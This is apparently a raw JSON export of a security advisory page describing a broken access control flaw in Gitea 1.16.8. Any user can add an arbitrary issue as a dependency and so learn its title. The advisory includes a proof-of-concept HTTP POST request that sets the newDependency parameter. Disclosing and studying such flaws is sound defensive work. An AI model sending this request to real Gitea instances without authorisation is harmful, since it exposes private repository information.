{"id":23017,"date":"2022-10-31T11:44:00","date_gmt":"2022-10-31T10:44:00","guid":{"rendered":"https:\/\/herolab.usd.de\/?page_id=23017"},"modified":"2024-07-24T11:37:56","modified_gmt":"2024-07-24T09:37:56","slug":"usd-2022-0024","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2022-0024\/","title":{"rendered":"usd-2022-0024"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.16\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.26.1\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<\/p>\n

usd-2022-0024 | Broken Access Control in Gitea Issue Dependencies<\/h2>\n

Advisory ID<\/strong>: usd-2022-0024
Product<\/strong>: Gitea
Affected Version<\/strong>: 1.16.8
Vulnerability Type<\/strong>:https:\/\/cwe.mitre.org\/data\/definitions\/284.html<\/a>
Security Risk<\/strong>: Medium
Vendor URL<\/strong>: https:\/\/gitea.io\/<\/a>
Vendor Status<\/strong>: Fixed
Advisory Status<\/strong>: Closed
First Published<\/strong>: Not published yet
Last Update<\/strong>: 2022-06-30<\/p>\n

Description<\/h3>\n

In Gitea issues can have dependencies to other issues. Due to improper access controls, users can add any issue as a dependency, which discloses the title of the issues.<\/p>\n

Proof of Concept<\/h3>\n

By setting the newDependency<\/strong> parameter to any issue id the issue will be added as dependecy.<\/p>\n

Exemplary request:<\/p>\n

\n
<\/span>POST<\/span> \/testuser\/test222\/issues\/2\/dependency\/add<\/span> HTTP<\/span>\/<\/span>1.1<\/span>\nHost<\/span>:<\/span> localhost:3000<\/span>\nContent-Length<\/span>:<\/span> 76<\/span>\nPragma<\/span>:<\/span> no-cache<\/span>\nCache-Control<\/span>:<\/span> no-cache<\/span>\nUpgrade-Insecure-Requests<\/span>:<\/span> 1<\/span>\nOrigin<\/span>:<\/span> null<\/span>\nContent-Type<\/span>:<\/span> application\/x-www-form-urlencoded<\/span>\nUser-Agent<\/span>:<\/span> Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/97.0.4692.99 Safari\/537.36<\/span>\nAccept<\/span>:<\/span> text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9<\/span>\nAccept-Encoding<\/span>:<\/span> gzip, deflate<\/span>\nAccept-Language<\/span>:<\/span> en-US,en;q=0.9<\/span>\nCookie<\/span>:<\/span> XXXX<\/span>\nConnection<\/span>:<\/span> close<\/span>\n\n_csrf=NG[REDACTED]&newDependency=7\n<\/pre>\n<\/div>\n
Fix<\/h3>\n
It is recommended to restrict access to sensitive functions or information by default.
Required access privileges should be granted explicitly by a global access control mechanism.<\/p>\n
References<\/h3>\n